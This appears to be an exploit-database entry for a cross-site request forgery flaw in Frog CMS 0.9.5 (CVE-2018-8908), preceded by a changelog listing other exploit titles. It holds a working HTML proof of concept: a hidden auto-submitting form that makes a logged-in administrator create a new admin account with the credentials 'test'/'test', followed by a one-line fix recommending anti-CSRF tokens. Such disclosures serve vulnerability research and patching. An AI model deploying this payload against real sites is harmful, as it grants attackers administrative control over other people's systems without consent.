
11 changes to exploits/shellcodes WebLog Expert Enterprise 9.4 - Privilege Escalation Tenda FH303/A300 Firmware V5.07.68_EN - Remote DNS Change Tenda FH303/A300 Firmware v5.07.68_EN - Remote DNS Change Tenda W3002R/A302/w309r Wireless Router V5.07.64_en - Remote DNS Change (PoC) Tenda W3002R/A302/w309r Wireless Router v5.07.64_en - Remote DNS Change (PoC) Frog CMS 0.9.5 - Cross-Site Request Forgery (Add User) WampServer 3.1.1 - Cross-Site Scripting / Cross-Site Request Forgery WampServer 3.1.2 - Cross-Site Request Forgery VideoFlow Digital Video Protection (DVP) 2.10 - Directory Traversal VideoFlow Digital Video Protection (DVP) 2.10 - Hard-Coded Credentials DLink DIR-601 - Admin Password Disclosure OpenCMS 10.5.3 - Cross-Site Request Forgery OpenCMS 10.5.3 - Cross-Site Scripting Secutech RiS-11/RiS-22/RiS-33 - Remote DNS Change
58 lines
No EOL
1.9 KiB
HTML
58 lines
No EOL
1.9 KiB
HTML
# Exploit Title: Cross Site Request Forgery- Frog CMS
|
||
# Date: 31-03-2018
|
||
# Exploit Author: Samrat Das
|
||
# Contact: http://twitter.com/Samrat_Das93
|
||
# Website: https://securitywarrior9.blogspot.in/
|
||
# Vendor Homepage: https://github.com/philippe/FrogCMS
|
||
# Version: 0.9.5
|
||
# CVE : CVE-2018-8908
|
||
# Category: Webapp CMS
|
||
|
||
|
||
1. Description
|
||
|
||
The application source code is coded in a way which allows malicious HTML
|
||
request to be executed without veryifying source of request.This leads to
|
||
arbitary execution with malicous request which will lead to the creation of
|
||
a privileged user.
|
||
|
||
2. Proof of Concept
|
||
|
||
Visit the application
|
||
Visit the Add Users Page.
|
||
Craft an html page with all the details for an admin user creation
|
||
and host it on a server
|
||
Upon the link being clicked by a logged in admin user, immidiately,
|
||
another admin user will get created.
|
||
|
||
Exploit Code:
|
||
|
||
<html>
|
||
<body>
|
||
<form action="http://localhost/frog/admin/?/user/add" method="POST">
|
||
<input type="hidden" name="user[name]" value="Test_1" />
|
||
<input type="hidden" name="user[email]" value="" />
|
||
<input type="hidden" name="user[username]" value="test" />
|
||
<input type="hidden" name="user[password]" value="test" />
|
||
<input type="hidden" name="user[confirm]" value="test" />
|
||
<input type="hidden"
|
||
name="user_permission[administrator]" value="1" />
|
||
<input type="hidden" name="commit" value="Save" />
|
||
<input type="submit" value="Submit request" />
|
||
</form>
|
||
</body>
|
||
</html>
|
||
|
||
|
||
3. Solution:
|
||
|
||
Solution - Fix & Patch: The application code should be configured to
|
||
implement anti csrf token to filter malicous HTTP Requests.
|
||
|
||
|
||
4. Public Reference with POC and steps:
|
||
|
||
http://securitywarrior9.blogspot.in/2018/03/cross-site-request-forgery-frog-cms-cve.html
|
||
|
||
Thanks and Regards
|
||
Samrat |